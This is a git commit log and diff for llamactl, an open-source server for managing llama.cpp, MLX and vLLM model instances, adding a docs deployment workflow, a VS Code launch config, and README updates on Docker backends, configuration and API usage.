146 Commits

Author SHA1 Message Date
92cb57e816 Merge pull request #48 from lordmathis/fix/command-environment
fix: Pass host environment to instances
2025-09-28 21:40:50 +02:00
0ecd55c354 Start with host environment for instances 2025-09-28 21:37:48 +02:00
b4c17194eb Merge pull request #47 from lordmathis/fix/nil-context
fix: Initialize context before building command
2025-09-28 20:59:30 +02:00
808092decf Initialize context in Start method for command execution 2025-09-28 20:51:11 +02:00
12bbf34236 Merge pull request #46 from lordmathis/feat/env-vars
feat: Add support for passing env vars to instances
2025-09-28 15:42:02 +02:00
9a7255a52d Refactor Docker support section in README for clarity and conciseness 2025-09-28 15:31:50 +02:00
97a7c9a4e3 Detail env var support in docs 2025-09-28 15:29:43 +02:00
fa9335663a Parse backend env vars from env vars 2025-09-28 15:22:01 +02:00
d092518114 Update documentation 2025-09-28 15:10:35 +02:00
ffa0a0c161 Remove ZodFormField and BasicInstanceFields components 2025-09-28 14:42:10 +02:00
1fbf809a2d Add EnvironmentVariablesInput component and integrate into InstanceSettingsCard 2025-09-28 14:42:10 +02:00
c984d95723 Add environment variable support to instance options and command building 2025-09-28 14:42:10 +02:00
50e1355205 Add environment field to BackendSettings for improved configuration 2025-09-28 14:42:10 +02:00
7994fd05b3 Merge pull request #44 from BobbyL2k/fix/rel-dir-config
fix: InstancesDir and LogsDir not being relative path to DataDir when not set
2025-09-27 21:33:00 +02:00
Anuruth Lertpiya
f496a28f04 fix: InstancesDir and LogsDir not being relative path to DataDir when not set 2025-09-27 18:14:25 +00:00
f9371e876d Merge pull request #43 from BobbyL2k/fix/config-path
fix: llamactl reads config file per documentation
2025-09-27 19:32:13 +02:00
Anuruth Lertpiya
3a979da815 fix: llamactl reads config file per documentation
- Added logging to track config file reading operations
- llamactl now properly reads config files from the expected locations ("llamactl.yaml" and "config.yaml" under current directory)
2025-09-27 17:03:54 +00:00
a824f066ec Merge pull request #42 from lordmathis/feat/docker-backends
feat: Add support for dockerized backends
2025-09-25 23:07:24 +02:00
2cd9d374a7 Add Docker badge to UI 2025-09-25 23:04:24 +02:00
031d6c7017 Update Docker command arguments for llama-server and vllm with volume mounts 2025-09-25 22:51:51 +02:00
282344af23 Fix docker command args building 2025-09-25 22:51:40 +02:00
bc9e0535c3 Refactor command building and argument handling 2025-09-25 22:05:46 +02:00
2d925b473d Add Docker support documentation and configuration for backends 2025-09-24 22:15:21 +02:00
ba0f877185 Fix tests 2025-09-24 21:35:44 +02:00
840a7bc650 Add Docker command handling for backend options and refactor command building 2025-09-24 21:34:54 +02:00
76ac93bedc Implement Docker command handling for Llama, MLX, and vLLM backends 2025-09-24 21:31:58 +02:00
72d2a601c8 Update Docker args in LoadConfig and tests to include 'run --rm' prefix 2025-09-24 21:27:51 +02:00
9a56660f68 Refactor backend configuration to use structured settings and update environment variable handling 2025-09-24 20:31:20 +02:00
78a483ee4a Merge pull request #41 from lordmathis/fix/docs-release
fix: Refactor docs workflow to trigger on version tags
2025-09-23 22:35:05 +02:00
cdcef7c7ae Refactor docs workflow to trigger on version tags 2025-09-23 22:32:02 +02:00
6f5d886089 Merge pull request #40 from lordmathis/feat/system-info
feat: rework system info dialog
2025-09-23 22:11:42 +02:00
e3bf8ac05a Update SystemInfo dialog 2025-09-23 22:05:31 +02:00
edf0575925 Replace SystemInfoDialog with BackendInfoDialog and update related references 2025-09-23 21:44:04 +02:00
71a48aa3b6 Update server API functions to use /backends/llama-cpp path 2025-09-23 21:28:23 +02:00
30e40ecd30 Refactor API endpoints to use /backends/llama-cpp path and update related documentation 2025-09-23 21:27:58 +02:00
322e1c5eb7 Merge pull request #39 from lordmathis/feat/instance-dialog
feat: Redesign create/edit instance dialog
2025-09-23 21:14:34 +02:00
2cbd666d38 Redesign create/edit instance dialog 2025-09-23 21:11:00 +02:00
9ebc05fa3a Merge pull request #38 from lordmathis/feat/instance-card
feat: Redesign instance card
2025-09-23 19:48:20 +02:00
05e4335389 Fix instance management tests 2025-09-23 19:45:45 +02:00
850cf018e3 Refactor BackendBadge component 2025-09-23 19:20:53 +02:00
9c3da55c5d Improve InstanceCard layout 2025-09-23 18:12:58 +02:00
16d311a3d0 Merge pull request #37 from lordmathis/lordmathis-patch-1
fix: Set default docs version
2025-09-23 13:48:53 +02:00
32f58502de Update docs.yml 2025-09-23 13:46:58 +02:00
788f5a2246 Merge pull request #36 from lordmathis/lordmathis-patch-1
fix: Run docs build job on every update
2025-09-23 13:21:53 +02:00
37f464007f Update docs.yml 2025-09-23 13:19:54 +02:00
84d994c625 Merge pull request #35 from lordmathis/chore/docs-update
chore: Update docs
2025-09-22 23:24:12 +02:00
120875351f Fix image paths for MkDocs rendering in readme_sync.py 2025-09-22 23:22:27 +02:00
3a63308d5f Update error descriptions in API documentation for clarity 2025-09-22 22:39:01 +02:00
46622d2107 Update documentation and add README synchronization 2025-09-22 22:37:53 +02:00
ebc82c37aa Merge pull request #34 from lordmathis/feat/vllm-backend
feat: Implement vLLM backend
2025-09-22 21:58:19 +02:00
48b3a39dfe Move badges in instance card 2025-09-22 21:54:04 +02:00
c10153f59f Add BackendBadge component and integrate it into InstanceCard 2025-09-22 21:48:33 +02:00
588b025fb1 Handle empty responses for JSON endpoints in apiCall function 2025-09-22 21:39:44 +02:00
6dcf0f806e Fix VLLM command placeholder formatting 2025-09-22 21:30:59 +02:00
184d6df1bc Fix vllm command parsing 2025-09-22 21:25:50 +02:00
313666ea17 Fix missing vllm proxy setup 2025-09-22 20:51:00 +02:00
c3ca5b95f7 Update BuildCommandArgs to use positional argument for model and adjust tests accordingly 2025-09-22 20:32:03 +02:00
2c86fc6470 Update api referrence 2025-09-21 22:16:56 +02:00
785915943b Update api docs 2025-09-21 22:03:07 +02:00
55765d2020 Add vLLM backend support to documentation and update instance management instructions 2025-09-21 21:57:36 +02:00
6ff9aa5470 Remove vLLM backend implementation specification document 2025-09-21 21:38:10 +02:00
501afb7f0d Refactor form components and improve API error handling 2025-09-21 21:33:53 +02:00
b665194307 Add vLLM backend support to webui 2025-09-21 20:58:43 +02:00
7eb59aa7e0 Remove unused JSON unmarshal test and clean up command argument checks 2025-09-19 20:46:25 +02:00
64842e74b0 Refactor command parsing and building 2025-09-19 20:23:25 +02:00
34a949d22e Refactor command argument building and parsing 2025-09-19 19:59:46 +02:00
ec5485bd0e Refactor command argument building across backends 2025-09-19 19:46:54 +02:00
9eecb37aec Refactor MLX and VLLM server options parsing and args building 2025-09-19 19:39:36 +02:00
c7136d5206 Refactor command parsing logic across backends to utilize a unified CommandParserConfig structure 2025-09-19 18:36:23 +02:00
4df02a6519 Initial vLLM backend support 2025-09-19 18:05:12 +02:00
02fdae24ee Merge pull request #33 from lordmathis/feat/doc-versioning
feat: Docs versioning
2025-09-18 21:07:04 +02:00
9a8647775d Setup docs versioning 2025-09-18 21:04:11 +02:00
3081a1986b Merge pull request #32 from lordmathis/feat/mlx-backend
feat: Implement mlx-lm backend
2025-09-18 20:34:04 +02:00
6a580667ed Remove LlamaExecutable checks from default and file loading tests 2025-09-18 20:30:26 +02:00
2a20817078 Remove redundant LlamaExecutable field from instance configuration in tests 2025-09-18 20:29:04 +02:00
5e2d237887 Update project description for clarity and consistency in README 2025-09-18 20:21:30 +02:00
84c3453281 Refactor features section in README for improved clarity and organization 2025-09-18 20:14:03 +02:00
8006dd3841 Fix formatting in README for consistency in feature descriptions 2025-09-18 20:03:19 +02:00
8820dc1146 Enhance documentation for MLX backend support 2025-09-18 20:01:18 +02:00
11296bc5f8 Update README to include MLX backend support and enhance usage instructions 2025-09-18 19:34:40 +02:00
5121f0e302 Remove PythonPath references from MlxServerOptions and related configurations 2025-09-17 21:59:55 +02:00
587be68077 Add MLX backend support with configuration and parsing enhancements 2025-09-16 22:38:39 +02:00
cc5d8acd92 Refactor instance and manager tests to use BackendConfig for LlamaExecutable and MLXLMExecutable 2025-09-16 21:45:50 +02:00
154b754aff Add MLX command parsing and routing support 2025-09-16 21:39:08 +02:00
63fea02d66 Add MLX backend support in CreateInstanceOptions and validation 2025-09-16 21:38:33 +02:00
468688cdbc Pass backend options to instances 2025-09-16 21:37:48 +02:00
988c4aca40 Add MLX backend config options 2025-09-16 21:14:19 +02:00
1f25e9d05b Merge pull request #31 from lordmathis/feat/parse-command
feat: Implement command parsing in Create Instance
2025-09-15 22:18:39 +02:00
1b5934303b Enhance command parsing in ParseLlamaCommand and improve error handling in ParseCommandRequest 2025-09-15 22:12:56 +02:00
ccabd84568 Add margin to textarea in ParseCommandDialog for improved spacing 2025-09-15 21:36:24 +02:00
e7b06341c3 Enhance command parsing in ParseLlamaCommand 2025-09-15 21:29:46 +02:00
323056096c Implement llama-server command parsing and add UI components for command input 2025-09-15 21:04:14 +02:00
cb1669f853 Merge pull request #30 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-f5c1666f0c
Bump vite from 7.0.5 to 7.1.5 in /webui in the npm_and_yarn group across 1 directory
2025-09-14 10:47:38 +02:00
dependabot[bot]
a5d1f24cbf Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.0.5 to 7.1.5
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.5/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.5
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-09-09 21:38:38 +00:00
92f0bd02f2 Merge pull request #29 from lordmathis/lordmathis-patch-1
chore: Switch main dashboard screenshot
2025-09-04 22:54:06 +02:00
0a16f617ad Add files via upload 2025-09-04 22:47:14 +02:00
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
86 changed files with 8285 additions and 3095 deletions

.github/workflows/docs.yml (new file)

@@ -0,0 +1,103 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
tags: [ 'v*' ]
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: write
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
deploy-dev:
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main' && github.event_name == 'push'
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy development version
run: |
mike deploy --push --update-aliases dev latest
# Set dev as default if no default exists
if ! mike list | grep -q "default"; then
mike set-default --push dev
fi
deploy-release:
runs-on: ubuntu-latest
if: startsWith(github.ref, 'refs/tags/v')
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy release version
run: |
VERSION=${GITHUB_REF#refs/tags/}
mike deploy --push --update-aliases $VERSION stable
mike set-default --push stable
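
The same mike flow can be exercised locally before tagging a release; a minimal sketch, assuming `docs-requirements.txt` installs mike and MkDocs as the workflow does (the `dev`/`latest` names mirror the workflow above):

```bash
# Install the documentation toolchain (mkdocs, mike, theme)
pip install -r docs-requirements.txt

# Build the "dev" version and tag it with the "latest" alias,
# committing only to the local gh-pages branch (the workflow adds --push)
mike deploy --update-aliases dev latest

# List deployed versions and preview the versioned site locally
mike list
mike serve
```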

.gitignore

@@ -32,4 +32,6 @@ go.work.sum
# .vscode/
node_modules/
dist/
dist/
__pycache__/

.vscode/launch.json (new file)

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}
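
Outside of VS Code, the same development settings can be reproduced from a shell; a rough equivalent of this launch configuration, assuming a standard Go toolchain:

```bash
# Mirror the launch.json environment and run the server directly
GO_ENV=development \
LLAMACTL_REQUIRE_MANAGEMENT_AUTH=false \
go run ./cmd/server/main.go
```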


@@ -129,6 +129,50 @@ Use this format for pull request titles:
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)

README.md

@@ -2,30 +2,39 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Why llamactl?
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
![Dashboard Screenshot](docs/images/screenshot.png)
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
![Dashboard Screenshot](docs/images/dashboard.png)
## Quick Start
```bash
# 1. Install llama-server (one-time setup)
# See: https://github.com/ggml-org/llama.cpp#quick-start
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
@@ -42,15 +51,27 @@ llamactl
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Create instance
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
-d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
@@ -85,16 +106,65 @@ go build -o llamactl ./cmd/server
## Prerequisites
### Backend Dependencies
**For llama.cpp backend:**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Quick install methods:
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
# Or use Docker - no local installation required
```
**For MLX backend (macOS only):**
You need MLX-LM installed:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
**For vLLM backend:**
You need vLLM installed:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# Or use Docker - no local installation required
```
## Docker Support
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
```yaml
backends:
llama-cpp:
docker:
enabled: true
vllm:
docker:
enabled: true
```
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
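
Under the hood, enabling Docker means llamactl launches the backend through `docker` instead of a local binary. A rough sketch of what the default llama-cpp Docker settings shown below translate to (the model path and port are placeholders; the exact argument list is assembled by llamactl):

```bash
# Approximate effect of the default llama-cpp Docker settings
docker run --rm --network host --gpus all \
  ghcr.io/ggml-org/llama.cpp:server \
  --model /path/to/model.gguf --port 8081
```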
## Configuration
llamactl works out of the box with sensible defaults.
@@ -106,6 +176,32 @@ server:
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {} # Environment variables for the container
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {} # Environment variables for the container
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
@@ -113,7 +209,8 @@ instances:
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
llama_executable: llama-server # Path to llama-server executable
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
@@ -121,7 +218,6 @@ instances:
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
@@ -129,103 +225,7 @@ auth:
management_keys: [] # Keys for management endpoints
```
<details><summary><strong>Full Configuration Guide</strong></summary>
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
#### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
</details>
For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
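
For quick overrides without editing a config file, the environment variables covered in that guide can be set inline; a small sketch (the management key value is a placeholder):

```bash
# Override the port and require an explicit management key for this run
LLAMACTL_PORT=9090 \
LLAMACTL_REQUIRE_MANAGEMENT_AUTH=true \
LLAMACTL_MANAGEMENT_KEYS=sk-management-placeholder \
llamactl
```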
## License


@@ -19,6 +19,243 @@ const docTemplate = `{
"host": "{{.Host}}",
"basePath": "{{.BasePath}}",
"paths": {
"/backends/llama-cpp/devices": {
"get": {
